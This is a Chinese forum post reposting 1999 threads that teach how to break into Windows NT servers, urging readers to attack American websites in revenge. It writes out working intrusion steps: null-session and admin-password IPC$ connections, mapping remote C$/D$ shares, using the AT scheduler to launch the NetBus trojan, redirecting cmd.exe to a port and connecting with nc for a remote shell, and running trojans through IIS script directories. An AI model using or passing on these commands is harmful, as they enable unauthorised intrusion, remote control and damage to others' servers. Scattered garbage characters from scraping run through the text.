找回密码
 注册

QQ登录

只需一步,快速开始

关于“怎样进入NT主机”的几点补充

[复制链接]
发表于 2011-1-13 17:03:28 | 显示全部楼层 |阅读模式
《版主页黑客工具和文章的几个问题》中提到:
* `7 H6 u3 c# z& M( d% N请教,从版主页上载得PINGER,GRINDER,LETMEIN等,却不能用,PINGER安装后,明明安装前文件有1M多,但安装完后生成的文件夹中只有PINGER。EXE,40多K,运行PINGER,设置好IP,点PING,弹出一个窗口(C++。。。),说出错,然后关闭了,何故,是不是安装有误? 2。运行LETMEIN,弹出以下错误:连接文件LETMEIN。EXE到不存在的NETAPI32。DLL;NETGROUPGETUSERS。 是否说明需要NETAPI32。DLL文件,哪里有该DLL。 3。USAKILLER 的教学文章中提到需在WINNT4。0下运行以下步骤等,是否要求我的操作系统也是WINNT4。0 ,应该不是吧? 4。NC FOR NT 是否要求我的操作系统为NT,还是服务器的操作系统为NT? 太多的问题需高手回答,我花那么多的时间和金钱下载这几M文件却不能用,实在窝囊哦, 强烈建议USAKILLER 等高手级的黑客写更多的教学文章,以提高我国黑客水平。
% d5 k* f6 X# m. W4 s7 t> 我的机子MMX166,WIN98,2。5G,32M内存。( T) q. z* e' \" H- D- K  u- Q

1 A+ \. e4 U9 v* `黑客并不神秘,你只要了解操作系统,学习一些操作系统的弱点,辅助相关的工具,就可以成功。
, m- a" p" B3 W0 n1 e  G: J0 j2 c你的问题是,pinger, grinder, letmein等工具必须要在NT上运行,我们强烈建议,你一定要安装NT,对于你的机器配制,和我们现在差不多,只是比你多了32M内存,2G硬盘。
1 W3 ?+ [. p/ T0 V其实,攻击敌站,利用其操作系统本身的工具就可以了,比如,我们在NT上攻击某服务器,该服务器为NT4.0,我们将做如下简单事情就有可能成功,假设目标NT的IP地址为111.111.111.111,做法如下:* D- O$ G+ P6 r5 g/ M
net use \\111.111.111.111\ipc$ "" /user:""
7 Z4 [# Y5 L. y; @4 g$ B- Qnet.exe是NT的工具文件,该命令将和目标服务器建立Null Session,如果成功,你可以查看该服务器上的共享目录:
6 v/ q: _8 m* E6 ]net view \\111.111.111.111
4 ]$ N. ]( t7 o8 s8 A# X( F当然,如果你有该NT管理员密码,就更好办了,假设其管理员Admin密码为fuck:8 L- q4 ^! r& d, J6 z! l% O
net use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
/ z1 ~' W5 N1 L/ R( U  K. t命令成功后,几乎所有目标NT上的配制,资源,你都可以在你本地NT上连接远程计算机来查看或修改:
* ^& n  L- O. O- T) m  F1、查看或修改远程机器上的硬盘,假如目标NT上有C、D两个硬盘:$ k$ A5 p) Q+ y* u1 B
net use x: \\111.111.111.111\c$
2 f3 c7 a7 H  D$ X1 v& k% |net use y: \\111.111.111.111\d$
- A8 R% s8 E; V1 ]3 Y' A& S" L这样,目标NT上的C、D盘分别被影射为你本地的X、Y盘,你想怎么做都可以...
5 p- H2 H+ {5 K) W; `0 h% S2、管理目标NT的用户:9 y3 p9 ~7 z& J
从“开始”->“程序”->“管理工具(公用)”->“域用户管理器”->菜单:“用户”->“选择域”7 B8 {. R+ O  W6 Z8 q6 ~
键入\\111.111.111.111后,目标NT上的所有用户你想怎么做都可以,和管理你本地的一样
/ Y/ @* a( }& e  a1 ~* y: P1 M3、管理目标NT的服务
3 ^1 M: M0 ~2 z  k4 e+ {$ S选择“管理工具(公用)”->“服务器管理”->“计算机”->“选择域”1 H8 e7 x. r$ d% D
这样你可以管理目标NT上的服务,共享目录- q  v2 c+ O$ |. H" [5 o4 y
4、IIS管理# J8 M) C3 N4 P# T# W3 g& u
选择“Microsoft Internet Service管理”->“Internet 服务管理器”->"连接到服务器"->111.111.111.111
: j& ]. k/ p% x' ]+ H  S! K) U目标NT的FTP、WWW服务你就可以重新配置
$ O) L; Z: C+ M1 d" g% G4 \5、事件管理4 e  V" V: f9 ~! p! w( r5 T
“事件查看器”->连接到服务器->111.111.111.111" K8 `/ A- t9 t8 N0 M% z" C+ j

' J& G# o  b/ e还有更多的东西,都可以用NT本身的功能来完成,这些都是95, 98所不能实现的。
0 \& \# q" X9 B( r5 _
$ ?" E! \. P$ L5 N' a当然,98,95也能做一些事情,但很麻烦,比如:% u9 t+ g8 `! s7 `/ A1 S
net use \\111.111.111.111\ipc$$ ?5 I5 \% h8 E( k4 M3 k
net use z: \\111.111.111.111\d$
/ a5 w( ^2 \* H! {) r- Z但其后不能带参数,即改用其他用户或密码,系统将用当前用户和密码去登录,如果你知道目标NT的用户或密码,重新启动95, 98,改用该用户和密码登录,方可实现,你可以连接目标NT上的共享资源,但不能进行管理,如用户、事件等/ H! r+ }3 g0 r7 W
& U2 z: K( X9 q6 W) ^  S5 V
我们强烈建议各位有心要为死难者报仇,真正的想黑霉国的站点,花点时间,装个NT吧,NT Workstation也可以!! L. p% G: t4 x9 M
这样,你还可以了解目标机器上能有什么东东供你去用!1 m/ t% @1 \9 q* c$ h! T* l$ T
6 F# a: a( }! C9 |+ |; x
+ M$ |7 j# e' a3 [
--------------------------------------------------------------------------------
9 S: e; U$ Y1 P0 y' |7 Y8 F  o& b7 n4 N& B3 Z
>quack于1999-06-12,23:37:44
; Y6 w9 K' v# g, V! V在大作《几个有关黑的问题》中提到:$ `1 N; w" j  d" N5 w; i
首先向各位黑兄们致敬,我下了你们的传的东东,但发现在用LETMEIN.EXE的时候没有用到MYPWD的参数,键入LETMEIN查询其使用方法时亦无此参数项,不知为是何原因?另,用PINGER查询到的IP地址若无机器名的是否可以直接进入,我怎么用NET USE总无法登陆?再有,假定我上传了CIH,对了,CIH对NT暂时无效,假定上传其它"有益"美国NT主机的东东上去,而未传NETBUS,可否直接在其机了运行此东东使其当堂暴毙?--我曾用LEGION上美国机子,但运行程序时却是在我的机上干活,差点把自己毙了!再有,我在微软的CHAT中常遇到美国鬼子,在其CHAT下怎样才能看到它的IP?怎样把它们给KILL了?--顺便说一句,我还真干掉了几个美国人,哈!。' `- Q8 |! G! ^) @$ ^1 k! I
- Z$ M4 k$ Z$ [. l
killusa于1999-06-13,03:25:15
4 V# o7 i8 m4 e在大作《Re: 几个有关黑的问题》中提到:% d+ k- ]$ A1 [/ ^: j6 @2 ]8 [; ~

: ?3 B4 n% _& p9 t# m3 |6 Lletmein.exe 暂时没有mypwd参数,十分抱歉
, D0 M4 q. B5 S0 Lpinger程序,只是利用ping来寻找主机,每台NT服务器有一个主IP地址,但也可以设置多个辅助IP地址,比如有些服务器供应商,一台NT服务器上可以设置一千多个IP,每个IP对应一个Hostname,而真正能找到主机名的只有一个IP地址,就是该主机的主IP地址,所以有时显示只有IP,而无主机名。另外,有些服务器是非NT的操作系统,有时将不会显示主机名。当然,有时在服务器上进行一些设置,也会出现上面的情况。
: w, b( a! T  u9 h; \+ y$ A+ |8 R  z
" b# |, `7 k% n+ W2 LNetbus分客户端程序ntsrv.exe和服务器端netbus.exe两个程序,所以,netbus.exe是不用上传的,只需在目的
7 J. s4 q! u. M+ T/ K服务器上运行ntsrv.exe,而在目的服务器运行该程序有很多种方法:$ u6 n% v4 ?8 z# F/ h7 }( I

3 ]% x, b6 B7 v! S5 N+ A1、利用服务器的 Schedule 服务来启动schedule 服务是指在服务器上定时运行某程序,具体使用方法,可在自己的NT Dos窗口下键入以下:
  C) K- B0 N( b8 I* ~; B
1 |/ F# r) c, ~- M. M4 uC:\>net start schedule* T! m- ~. i/ u6 o- C, }
Schedule 正在启动服务.....
1 x5 u- X" Q" y7 E2 p+ tSchedulw 服务启动成功。
: p  c8 w; D/ G2 w4 gC:\>at /?. o9 m+ e1 N6 G+ Q; b0 z: ^- ]
AT 命令排定在特定的日期和时间运行某些命令和程序。( ?$ J6 m" [) p& q
运行 AT 命令之前必须先启动 Schedule 服务。
  X1 X0 m$ o( w5 G" _2 a! H. V8 B
; M8 B! f1 \" V$ @1 }5 UAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]6 b' ^" a! |; n
AT [\\computername] time [/INTERACTIVE]
. x  D+ ~, D( W3 B[ /EVERY:date[,...] | /NEXT:date[,...]] "command"" e: k& x1 R! U% x$ p: ]
, Q  t% s; y: @! K: b5 _6 N+ p
\\computername 指定远程计算机。 如果省略这个参数
) j- E' P8 W5 s* B3 O3 K  F命令会被排定在本机上运行。
3 Y4 N. C5 [/ X+ i" v6 _: Vid 指定给排定进度命令的识别号。
2 b% K  j4 U5 ~
" E4 F, {! @0 M) ?/delete 删除某个已排定进度的命令。如果省略标识,计算机上所有已排定进度的命令都会被删除。
9 {9 p6 l  w' y4 ]/yes 用于删除所有作业,且不想在运行删除时显示确认信息 。! _  |3 `+ W; N
time 指定命令运行的时间。
2 u5 d% d" T# ~/interactive 允许作业在运行时,与用户通过桌面交互。- R7 H. e- Y2 A1 {9 b$ h

: \0 V) b& I& u8 `$ P* V7 `5 j9 B2 w/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
5 e$ J/ `4 s0 ]4 U3 D5 ]如果省略日期,则默认为在每月的本日运行。! ~" ^$ Y3 a! x: H3 p4 @& L

# J7 |' K  Z3 b/ w2 m/next:date[,...] 指定在下一个指定日期 (如,下周三),运行命令。如果省略日期,则默认为在每月的本日运行。
* w" }. k+ w& h# d$ }2 y0 C
9 n9 _6 {2 t( u"command" 准备运行的 Windows NT 命令或批处理文件。& T$ l3 O% [, W: R5 D* c
6 R+ H* _0 Z* @* [
C:\>5 c# M# j# `$ p
5 X; d1 U+ m9 Z- p
知道了如何使用AT,再来看看如何在远程NT上运行ntsrv.exe:4 Y, I' _+ H1 {. j  G5 y( \
1 利用管理员登陆到目的服务器,方法为: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser". w) b2 g2 @% b# w  g7 Z
2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
$ f4 O- C/ Y: }3 利用AT.EXE在远程服务器设置程序定时运行,当然最快运行最理想,所以,你可以用letmein.exe得到服务器的时间,然后:
+ `! t" I) T. f  yat \\x.x.x.x 00:00 ntsrv.exe /port:64321
* E( l: A3 _* V# f其中00:00要改为用letmein.exe得回来的具体时间+一点容量,等一会后,再在本地启动netbus.exe,键入目的服务器得ip地址或hostname,连接!具体使用可参照 "How to get in nt",比如第一种方法,你想要在目的服务器运行 LEGION,可以利用netbus得上传功能,将LEGION上传至目的服务器,再用netbus的"Start program",键入完整路径的LEGION运行程序,就ok了!第二种方法是利用netbus的“App redirect”功能,启动远程telnet服务,如下:在netbus中击“App redirect”,键入"C:\>winnt\system32\cmd.exe",Port为:4321,服务就启动了,然后在本地运行:nc x.x.x.x 4321,出现dos启动的画面就表示连接成功:
( P' Y- _/ g+ w3 PMicrosoft(R) Windows NT(TM)
$ {) ]* R% ]# a+ D(C) Copyright 1985-1996 Microsoft Corp.
: O5 X1 S. s8 u8 L( SC:\>
- U7 y$ R9 e! F- j+ I$ j& [: e4 j6 `
2、利用web启动ntsrv.exe或其他程序在目的服务器  w! `6 l9 E" |* c- ^' H

/ i) O7 h: N* S& b将ntsrv.exe 或其他运行程序Copy到目的服务器的www可执行目录,如cgi-bin或scripts,然后在浏览器键入url如:
5 _: m: U9 v% L) Ohttp://x.x.x.x/scripts/ntsrv.exe /port:64321% Q0 V1 _% ?/ X  E8 ?) e
http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
/ c8 m1 ?( `, ]4 t  e% t该程序就启动了
% Q3 K8 a0 J& t  b0 G+ V5 e. W* y
我只提这几中方法!
+ ]6 d; k9 D; ^要成功,必须打好基础工,对操作系统充分了解!; [  t' |7 g1 v6 o$ N

7 G0 s& f* r4 [( d' G
您需要登录后才可以回帖 登录 | 注册

本版积分规则

QQ|本地广告联系: QQ:905790666 TEL:13176190456|Archiver|手机版|小黑屋|汶上信息港 ( 鲁ICP备19052200号-1 )

GMT+8, 2026-1-30 12:13

Powered by Discuz! X3.5

© 2001-2025 Discuz! Team.

快速回复 返回顶部 返回列表